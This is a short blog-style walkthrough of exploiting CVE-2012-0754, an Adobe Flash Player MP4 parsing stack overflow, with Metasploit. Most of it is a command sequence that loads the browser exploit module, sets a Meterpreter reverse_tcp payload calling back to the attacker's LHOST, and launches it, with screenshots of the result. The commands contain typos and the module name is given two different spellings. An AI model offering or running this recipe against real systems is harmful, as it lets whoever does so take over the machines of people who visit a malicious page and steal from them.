Adobe Flash Player 新安全漏洞
【Not vulnerable】
Adobe Flash Player 11.1.115.6
Adobe Flash Player 11.1.111.6
Adobe Flash Player 11.1.102.6
【README - Metasploit Modules】
This module exploits a vulnerability found in Adobe Flash Player's Flash10u.ocx component. When processing a MP4 file (specifically the Sequence Parameter Set), Flash will see if pic_order_cnt_type is equal to 1, which sets the num_ref_frames_in_pic_order_cnt_cycle field, and then blindly copies data in offset_for_ref_frame on the stack, which allows arbitrary remote code execution under the context of the user.
【modules】
abobe_flash_mp4_cprt
【command】
msfupdate && msfconsole
serach adobe_mp4
use exploit/windows/browser/adobe_flash_mp4_cprt
show options
![[CVE-2012-0754]Flash Player on Metasploit<11.1.105.55 Remote code Execution>_vulnerable](https://s4.51cto.com/attachment/201203/125654375.png)
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST MY_IP
set URIPATH /
exploit
![[CVE-2012-0754]Flash Player on Metasploit<11.1.105.55 Remote code Execution>_adobe_02](https://s4.51cto.com/attachment/201203/130216522.png)
【supportate】
![[CVE-2012-0754]Flash Player on Metasploit<11.1.105.55 Remote code Execution>_vulnerable_03](https://s4.51cto.com/attachment/201203/130028613.png)
